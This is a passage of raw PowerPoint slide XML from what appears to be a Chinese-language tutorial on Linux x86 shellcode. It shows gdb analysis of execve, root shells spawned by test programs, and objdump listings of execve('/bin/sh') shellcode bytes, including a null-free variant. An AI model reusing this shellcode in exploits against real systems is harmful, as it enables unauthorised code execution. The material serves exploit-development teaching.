                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da0d &lt;execve+29&gt;: mov    %edi,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da0f &lt;execve+31&gt;: mov    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da14 &lt;execve+36&gt;: int    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da16 &lt;execve+38&gt;: pop    %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da17 &lt;execve+39&gt;: cmp    $0xfffff000,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da1c &lt;execve+44&gt;: mov    %eax,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da1e &lt;execve+46&gt;: ja     0x804da26 &lt;execve+54&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da20 &lt;execve+48&gt;: mov    %ebx,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da22 &lt;execve+50&gt;: pop    %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da23 &lt;execve+51&gt;: pop    %edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da24 &lt;execve+52&gt;: leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da25 &lt;execve+53&gt;: ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da26 &lt;execve+54&gt;: neg    %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da28 &lt;execve+56&gt;: call   0x80485fc &lt;__errno_location&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da2d &lt;execve+61&gt;: mov    %ebx,(%eax)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da2f &lt;execve+63&gt;: mov    $0xffffffff,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da34 &lt;execve+68&gt;: jmp    0x804da20 &lt;execve+48&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da36 &lt;execve+70&gt;: nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804da37 &lt;execve+71&gt;: nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) b *0x0804da14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 2 at 0x804da14</a:t>
            </a:r>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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 2, 0x0804da14 in execve ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x804da14 &lt;execve+36&gt;:      int    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/i $pc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x804da14 &lt;execve+36&gt;:  int    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) i reg $eax $ebx $ecx $edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>eax            0xb      11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ebx            0x808ef88        134803336</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ecx            0xbfffe640       -1073748416</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>edx            0x0      0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/s 0x808ef88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x808ef88 &lt;_IO_stdin_used+4&gt;:    "/bin/sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/2x 0xbfffe640</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0xbfffe640:     0x0808ef88      0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>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sh-2.05b# exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Program exited normally.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11655520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B87A39-B3DF-4E19-B397-9B5316E865F4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>241</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a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gcc -o shellcode_asm shellcode_asm.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# ./shellcode_asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# objdump -d shellcode_asm | more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>080482f4 &lt;main&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f4:       55                      push   %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f5:       89 e5                   mov    %esp,%ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f7:       83 ec 08                sub    $0x8,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482fa:       83 e4 f0                and    $0xfffffff0,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482fd:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048302:       29 c4                   sub    %eax,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048304:       ba 00 00 00 00          mov    $0x0,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048309:       52                      push   %edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804830a:       68 6e 2f 73 68          push   $0x68732f6e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804830f:       68 2f 2f 62 69          push   $0x69622f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048314:       89 e3                   mov    %esp,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048316:       52                      push   %edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048317:       53                      push   %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048318:       89 e1                   mov    %esp,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831a:       b8 0b 00 00 00          mov    $0xb,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831f:       cd 80                   int    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048321:       c9                      leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048322:       c3                      ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048323:       90                      nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> [root@zhugejw shellcode]# gcc -o shellcode_asm_fix shellcode_asm_fix.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>shellcode_asm_fix.c:12:6: warning: multi-line string literals are deprecated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# ./shellcode_asm_fix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# objdump -d shellcode_asm_fix | more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>080482f4 &lt;main&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f4:       55                      push   %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f5:       89 e5                   mov    %esp,%ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482f7:       83 ec 08                sub    $0x8,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 80482fa:       83 e4 f0                and    $0xfffffff0,%esp //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>栈对齐</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>80482fd:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>  8048302:       29 c4                   sub    %eax,%esp //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>代码对齐？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>---------------------------------------------------------------------------shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048304:       31 d2                   xor    %edx,%edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048306:       52                      push   %edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048307:       68 6e 2f 73 68          push   $0x68732f6e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804830c:       68 2f 2f 62 69          push   $0x69622f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048311:       89 e3                   mov    %esp,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048313:       52                      push   %edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048314:       53                      push   %ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048315:       89 e1                   mov    %esp,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 8048317:       8d 42 0b                lea    0xb(%edx),%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831a:       cd 80                   int    $0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> ----------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831c:       c9                      leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831d:       c3                      ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>  804831e:       90                      nop	//</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 804831f:       90                      nop</a:t>
            </a:r>
          </a:p>
          <a:p>
